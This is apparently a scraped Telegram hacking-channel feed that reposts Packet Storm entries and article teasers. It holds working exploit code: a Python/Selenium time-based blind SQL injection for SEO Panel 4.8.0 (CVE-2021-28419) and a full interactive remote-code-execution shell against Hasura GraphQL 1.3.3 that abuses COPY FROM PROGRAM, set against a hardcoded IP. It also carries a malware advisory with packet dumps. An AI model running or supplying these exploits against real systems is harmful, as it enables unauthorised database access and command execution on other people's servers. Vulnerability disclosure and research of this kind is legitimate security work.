Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Worm.Win32.Busan.k Insecure Transit

https://2.bp.blogspot.com/-y5QhCp_hFKM/WWlvahEOH0I/AAAAAAAAIPA/Q0VQ49Z0hVw4skegRDdSXm3Bk15Ptyg5wCLcBGAs/s1600/h70.png
Worm.Win32.Busan.k malware suffers from an insecure transit vulnerability.

MD5 | 754b5fcaa70daf8bda8786f1be2b3068

Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/bcad7aa6cb6cb9d94377cd88acbca1c9.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Worm.Win32.Busan.k
Vulnerability: Insecure Communication Protocol
Description: Busan.k launches a windows cmd console on the infected host so that it can send and receive messages back and forth over TCP port 2121. The worm uses unencrypted plaintext socket communication allowing anyone who can sniff network traffic to read any communications sent or retrieved. This can disclose sensitive information to third-party well positioned attackers.
Type: PE32
MD5: bcad7aa6cb6cb9d94377cd88acbca1c9
Vuln ID: MVID-2021-0185
Dropped files:
Disclosure: 04/23/2021
Exploit/PoC:
E.g. Wireshark to sniff communications.

18 24.610339 192.168.88.130 192.168.88.128 TCP 68 56103 → 2121 [PSH, ACK] Seq=1 Ack=1 Win=8212 Len=14
0000 00 XX XX XX XX XX 00 XX XX XX XX XX 08 00 45 00 ..).....)R....E.
0010 00 36 cc 00 40 00 80 06 00 00 c0 a8 58 82 c0 a8 .6..@.......X...
0020 58 80 db 27 08 49 3c 1a 3c 74 fc c1 08 dd 50 18 X..'.I
0030 20 14 32 7c 00 00 70 61 73 73 77 64 20 61 62 63 .2|..passwd abc
0040 31 32 33 0a 123.

0000 00 XX XX XX XX XX 00 XX XX XX XX XX 08 00 45 00 ..)R....).....E.
0010 00 34 1e c4 40 00 80 06 a9 ac c0 a8 58 80 c0 a8 .4..@.......X...
0020 58 82 08 49 db 27 fc c1 08 dd 3c 1a 3c 82 50 18 X..I.'....
0030 08 05 50 dc 00 00 49 20 68 61 74 65 20 79 6f 75 ..P...I hate you
0040 0d 0a ..

0000 00 XX XX XX XX XX 00 XX XX XX XX XX 08 00 45 00 ..).....)R....E.
0010 00 38 cc 02 40 00 80 06 00 00 c0 a8 58 82 c0 a8 .8..@.......X...
0020 58 80 db 27 08 49 3c 1a 3c 82 fc c1 08 e9 50 18 X..'.I
0030 20 14 32 7e 00 00 49 20 68 61 74 65 20 79 6f 75 .2~..I hate you
0040 20 74 6f 6f 21 0a too!.
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
SEO Panel 4.8.0 SQL Injection

https://4.bp.blogspot.com/-4tZE0Y76jWM/WWlvMNv2FRI/AAAAAAAAIMQ/Di9LOyWyOssTbh7urhFnaBV0oE1qNf8CgCLcBGAs/s1600/h19.png
SEO Panel version 4.8.0 remote blind SQL injection exploit. Original discovery in this version is attributed to Piyush Patil in February of 2021.

MD5 | 4b18d3433a071c4d3f98f08f8abcd113

Download
# Exploit Title: blind SQL injection on archive.php of SEO Panel 4.8.0
# Author: nu11secur1ty
# Testing and Debugging: nu11secur1ty
# Date: 04.25.2021
# Vendor: https://www.seopanel.org/
# Link: https://www.seopanel.org/spdownload/4.8.0
# CVE: CVE-2021-28419

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-28419

from selenium import webdriver
import time
#enter the link to the website you want to automate login.
website_link="http://192.168.1.3/seopanel/login.php"

#enter your login username
username="spadmin"

#enter your login password
password="spadmin"

#enter the element for username input field
element_for_username="userName"

#enter the element for password input field
element_for_password="password"

#enter the element for submit button
element_for_submit="login"
browser = webdriver.Chrome()
browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

# Exploit
browser.get(("
http://192.168.1.3/seopanel/archive.php?from_time=2021-04-25&order_col=(SELECT
7397 FROM
(SELECT(SLEEP(15)))nu11secur1ty)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id=1"))

print("payload is deployed MySQL is not responding correctly...\n")

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")

---------------------------------

# Exploit Title: blind SQL injection on archive.php of SEO Panel 4.8.0
# Date: 04.25.2021
# Exploit Authotr idea: @nu11secur1ty, xoffense
# Exploit Debugging: nu11secur1ty
# Vendor Homepage: https://www.seopanel.org/
# Software Link: https://www.seopanel.org/spdownload/4.8.0

# Steps to Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-28419


Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Hasura GraphQL 1.3.3 Remote Code Execution

https://4.bp.blogspot.com/-mbNmyGHywr4/WWlve-suujI/AAAAAAAAIP4/9elXOC6IHOcW_3VzQDLCix2bjP9zh38ZgCLcBGAs/s1600/h83.png
Hasura GraphQL version 1.3.3 remote code execution exploit.

MD5 | cf7dfca51665d509bd1a1e39f4c0c17e

Download
# Exploit Title: Hasura GraphQL 1.3.3 - Remote Code Execution
# Software: Hasura GraphQL
# Software Link: https://github.com/hasura/graphql-engine
# Version: 1.3.3
# Exploit Author: Dolev Farhi
# Date: 4/23/2021
# Tested on: Ubuntu

import requests
import sys

HASURA_SCHEME = 'http'
HASURA_HOST = '192.34.57.144'
HASURA_PORT = 80

print('Start typing shell commands...')

while True:
cmd = input('cmd $> ')
data = { "type":"bulk",
"args":[
{
"type":"run_sql",
"args":{
"sql":"SET LOCAL statement_timeout = 10000;","cascade":False,"read_only":False}
},
{
"type":"run_sql",
"args":{
"sql":"DROP TABLE IF EXISTS cmd_exec;\nCREATE TABLE cmd_exec(cmd_output text);\nCOPY cmd_exec FROM PROGRAM '" + cmd + "';\nSELECT * FROM cmd_exec;","cascade":False,"read_only":False}
}
]
}
endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
r = requests.post(endpoint, json=data)
if r.ok:
try:
for i in r.json()[1]['result']:
print(''.join(i))
except:
print(r.json())


Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
BoringDAO x Immunefi Bug Bounty

Continue reading on Medium »
Read more...
hacking: security in practice
Bcrypt hashes w/ rockyou

I may have had a dumb brain moment so wanted to check this to see if this makes sense. If I'm running hashcat against a bcrypt algo and using rockyou as the word list, wouldn't that list have already been reversed and available via say hashes.com or another site? Just trying to save myself time if it's already a thing....

Thanks!

submitted by /u/skyhighjake
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Тайминг-атака. Как спецслужбы деанонимизируют пользователей мессенджеров.

https://cdn-images-1.medium.com/max/1280/1*TRteTHsbwTAMiMPe7c4TEw.jpeg
Представьте себе ситуацию: вы сотрудник спецслужбы, и ваша задача — вычислить особо опасного преступника, занимающегося шантажом и…

Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Hack the Box — Archetype

https://cdn-images-1.medium.com/max/600/1*QvWsrhhyg5ehbDxTuUd-2w.png
In order to learn something, you have to be able to teach it. First in a series about the Starting Point Machines — Archetype is up First.

Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles
Active Directory Enumeration: PowerView

Active Directory Enumeration is a challenge for even some of the seasoned attackers and it is easy to miss some key components and lose the change to elevate that initial foothold that you might receive. In this article, we bring you methods that you can use to enumerate AD using

The post Active Directory Enumeration: PowerView appeared first on Hacking Articles.

___________________________
@hacking_Attack
@Hacking_Video